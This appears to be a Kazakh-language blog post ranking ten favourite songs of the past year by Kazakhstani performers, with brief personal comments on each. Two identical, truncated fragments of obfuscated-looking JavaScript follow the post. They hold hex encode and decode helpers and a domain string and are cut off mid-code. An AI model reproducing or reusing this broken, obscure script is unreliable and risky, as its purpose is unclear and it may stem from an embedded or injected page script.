Өткен жылдың үздік әндері

Тағы да сәлем! Ninety One туралы жазған посттан кейін, тағы бір қосымша пост жазуды жөн көрдім. Қазіргі жазар тақырып өткен жылдың үздік әндері. Бұл әндер тек мен үшін үздік әндер тізімі. Егер сіздің қосар әндеріңіз болса, қарсы емеспін. Тізімде тек Қазақстан әншілерінің әндері ғана жазылады. Ал, кеттік!

 

Ескерту: Бұл жерде той әндері немесе Қайрат Нұртастың әндері жоқ.


1. Мархаба Сәби - Ұнайды маған

Білмеймін, бірақ Мархаба осы жылдың ашылуы десем қателеспеймін. Музыкалық талғамы өте керемет. Бұл әнді ең алғаш таксиде келе жатып тыңдадым. Бірден ұнады, бірақ кім айтатынын біраз уақытқа дейін таба алмадым. Бір күні қызым екеуміз көлікте келе жатып тағы тыңдап қалдым. Сол сәтте осы әнді қызым білетінін айтып, вк желісінен жіберген болатын. Содан бері әлі менің плейлистімнің алдыңғы қатарында келеді. Сіздерге айтарым жақсы, қазақша сапалы әндерді жаныңызда жүрген сүйген қыздарыңыздан, қарындастарыңыздан, тәтелеріңізден сұраңыздар. Себебі, олардың қазақша әндерге музыкалық талғамдары жақсы:) Тыңдаңыздар, бағалаңыздар!

2. Ғаділбек Жаңай - Ханшайымым

Бұл ән үздік ән қатарына ойланбастан кіреді. Әннің сөзі бірден ұнады. Сөзінің авторы Ринат Зайытов ағамыз екен. Инстаграмда отырып осы әннің бірнеше нұсқаларын тыңдап мәз болғанмын. Әннің ұнағаны соншалық өзімде сол адамдар сияқты видео түсірдім. Менікі сіздер түсірген видеолардан аспайды, бірақ бір көруге болады:) Қысқасы, ән өте керемет. Үздік әндер тізіміне ойланбастан кіреді.

3. Ерке Есмахан & Төреғали Төреәлі - Алло

Ауылға бара жатып, поездің ішінде барлық адамның ұялы телефонында осы ән тұрғаны есімнен кетпейді. Кішкентай баладан үлкен қарияға дейін тыңдап келе жатқан әндердің бірі. Осы тізімнің алдыңғы орында тұратыны сөзсіз. Бұл әнді басында тыңдағанда ұнамағанын жасырмаймын. Бірақ әр жақтан достарым, туыстарым айтып тұрғанда қалай тыңдамауға болады. Бейнклипінің идеясы да ерекше жасалған. Қысқасы, маған ән де, клип те ұнады. Бағалаймыз!

4. Kental - Далида

Kental менің сүйікті әншілерімнің бірі. "Перизат" деген әні былтырғы жылы хит болып еді. Осы жылы да Kental керемет туындысымен халықтың көзіне түсті. Бұл ән орыс тілінде орындалған. Бұл тізімде "неге орыс тіліндегі ән жүр"- деп жазатындар да бар. Сіздерге айтарым бұл тізімде Отандық орындаушылардың әндері жарияланған. Бағалаймыз!

5. Ninety One - Айыптама

Бұл топ туралы айтар сөз көп. Кейін ақпарат жинап толық мағлұмат берермін. Осы жылда біраз тыңдармандарды шулатқан топ. Мына ән көп көп мектеп оқушыларының және қыздардың плейлистінде табылатыны сөзсіз. Жігіттер немесе Қайрат Нұртасты тыңдайтындар "Мына қыздекелер кімдер" - деп айтуы мүмкін. Ол кісілерге айтарым, бұл "Шоу Бизнес". "Айыптама" әні жылдың үздік әндері қатарына ойланбастан кіреді. Тыңдаймыз.

6. Ғалымжан Молданазар - Кім ол?

Бұл ән ертерек шыққан қателеспесем, бірақ тыңдармандарға естілмей қалған сияқты. Осы 2015 жылы әнге бейнеклип түсіріп, ән халықтың құлағына жетті. Қазақстанға осындай әндердің жетіспей жүргенін алдыңғы постта да жазған болатынмын. Ғалымжан Молданазар осы бағытта жұмыс істеп жүрген музыканттардың бірі. Көз тимесін :)

7. Бейбіт Кушкалиев - Қайтесің өзгені

Той әндерін бұл тізімге қоспаймын деп уәде берген болатынмын. Бірақ бұл әнді той әндері қатарына қоспауға да болады. Той әнін өз басым басқаша елестетемін. Өзім қатты билей аламасам да, бірақ осы ән қосылғанда қалай билегенімді де ұмытып кетемін. Бейбіттен тағы осындай жақсы әндер күтеміз.

8. Мақпал Исабекова - Хабарласпа

Бұл әнді қоссам ба, қоспасам ба екен деп көп ойланып, қосуды жөң көрдім. Маған әннен көрі бейнеклипі өте қатты ұнады. Сол себепті осы әнді тыңдап кеттім. клиптің идеясы өте қатты ұнады. Бірақ ән басқа бір шетелдің әніне қатты ұқсайды. Қай ән екенін жазбай-ақ қояйын. Онсыз да біршама халық қай ән екенін білетін сияқты. Сонда да бұл ән біраз адамдардың плейлистінен табылды. Сол себепті осы тізімге қостым. Тыңдаймыз.

9. Марсель - Бұл өмірде

Неге екенін білмеймін, Марсельден көп әндер шықпайды. Бірақ жылына бір ән шығарып біраз тыңдармандарды шулатып кетеді. Бұл әнді бірінші рет "Побег из аула" фильмінде тыңдадым. Тыңдаған сәттен өте қатты ұнады. Нұртас Адамбаевтың қазақша әндерге музыкалық талғамы жақсы екен :) Марсельден көп әндер күтемін. Ойланбастан өткен жылдың үздік әндері қатарына қосамын. Бағалаймыз.

10. Жанар Дугалова - Айта берсін

Бұл ән мен үшін үлкен "мотивация". Қиыншылықтарға тап болсан немесе ісің алға баспай жүрсе, осы әнді тыңдауға кеңес берем :) Керемет ән, Жанардың дауысымен бұл ән әркімнің құлағына жетті деп ойлаймын. Әннің сөзі де қарапайым, түсінікті, әніне сәйкес келеді. Бағалаймыз!

Достар, қорытындылай келе сіздерге айтарым: Қазақтың сапалы әнін тыңдап, өзіміздің музыкамызға бір үлесімізді қосайық. Егер бұл тізімге кіретін басқа әндер болса, жазыңыздар, ұялмаңыздар. Осы жыл сапалы әндерге толы болсын!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: